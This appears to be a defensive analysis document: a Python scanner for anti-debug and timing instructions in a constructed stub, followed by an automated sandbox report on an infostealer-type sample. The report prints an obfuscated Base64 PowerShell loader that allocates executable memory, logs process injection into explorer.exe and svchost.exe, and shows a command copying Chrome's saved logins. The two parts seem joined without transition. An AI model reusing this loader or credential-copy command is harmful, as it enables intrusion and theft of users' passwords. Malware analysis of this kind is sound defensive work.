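def classify_peb_use(following: bytes):
    """Map the bytes right after the PEB load to the field being read."""
    for pattern, (field, category) in PEB_USES.items():
        if following.startswith(pattern):
            return field, category
    return "unknown", "peb_read"


def scan(buf: bytes, base: int = 0) -> list:
    """Return every flagged instruction with its virtual address and category."""
    hits = []
    for mnemonic, sig in SIGS.items():
        for m in re.finditer(re.escape(sig), buf):
            hit = {"va": base + m.start(), "insn": mnemonic}
            if sig[0] == 0x64:  # fs-prefixed load of the PEB pointer
                hit["field"], hit["category"] = classify_peb_use(buf[m.end():m.end() + 4])
            else:               # rdtsc / rdtscp: raw timestamp read
                hit["field"], hit["category"] = "tsc", "timing"
            hits.append(hit)
    return sorted(hits, key=lambda h: h["va"])


def triage(hits: list) -> dict:
    """Count hits per category; anti_debug and timing are the ones worth a rule."""
    counts = {}
    for h in hits:
        counts[h["category"]] = counts.get(h["category"], 0) + 1
    return counts


# Constructed 32-bit stub (not bytes from the sample): the textbook BeingDebugged
# and NtGlobalFlag checks, a PEB->Ldr walk of the kind shellcode uses to find
# kernel32, and an rdtsc/rdtscp pair used to measure elapsed cycles.
SAMPLE = bytes.fromhex(
    "64a130000000"    # mov eax, fs:[30h]
    "0fb64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85c0"            # test eax, eax
    "7502"            # jne short +2
    "64a130000000"    # mov eax, fs:[30h]
    "8b4068"          # mov eax, [eax+68h]            ; PEB.NtGlobalFlag
    "a970000000"      # test eax, 70h
    "648b0d30000000"  # mov ecx, fs:[30h]
    "8b490c"          # mov ecx, [ecx+0Ch]            ; PEB.Ldr (API resolution)
    "0f31"            # rdtsc
    "8bd8"            # mov ebx, eax
    "0f01f9"          # rdtscp
    "2bc3"            # sub eax, ebx
    "c3"              # ret
)

if __name__ == "__main__":
    found = scan(SAMPLE, base=0x03420000)  # hypothetical load address
    for h in found:
        print(f"{h['va']:08X}  {h['insn']:<18} {h['field']:<14} {h['category']}")
    print(triage(found))
```

Run against a dumped region from the injected process, the per-category counts separate the few genuine debugger checks from the many PEB reads that only resolve imports, which is the distinction the raw list above does not make.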

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.dentalbatonrouge.com
Source: C:\Windows\explorer.exe Domain query: www.yzicpa.com
Source: C:\Windows\explorer.exe Network Connect: 108.175.14.116 80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #AIRED Sengelej Vendeta8 TEISTE Foelelsesm9 antityro TILS BLGFRU Bydef5 Mili5 Appos softfontet alko nonmarket Modis Mois Unveiled Unemac garblesf teena SHUTTLE Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Ofayve1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);}"@#Hutu7 garan dysch UNUNI Stor OVERIN liftma Electrodi Irriteret4 Boninite7 ecdysonan shar Karantnest brutto antraci Fyrme Laudruptri6 despotiz Tempelk Retssik demoudgave TACTU Obju LUDICROUSC stum Unpl Outsho8 nonpos Talehm Prote2 Test-Path "jobnavn" Test-Path "DRON" $Ofayve3=0;$Ofayve9=1048576;$Ofayve8=[Ofayve1]::NtAllocateVirtualMemory(-1,[ref]$Ofayve3,0,[ref]$Ofayve9,12288,64)#aishahska whamplave Studi7 Allegre8 Particular3 Savag3 ankomstr BYGNINGSSN Speede Vinhs2 Undere8 Epuralbial SUBTEST Degra Bemean8 PRSI Soldaterhj Prostituti1 utnkel Acreages7 FORD UNSOLEM OCCUPI ACCOUT KULTU Forhaile9 pla
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 3E0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2CD0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3440
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAI
ABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.679029461.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.707977610.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.759848257.0000000004F80000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.666851055.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.756579191.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687801292.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.704619524.00000000008B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000018.00000000.688218123.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.667253019.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.757490893.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000018.00000000.705115413.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY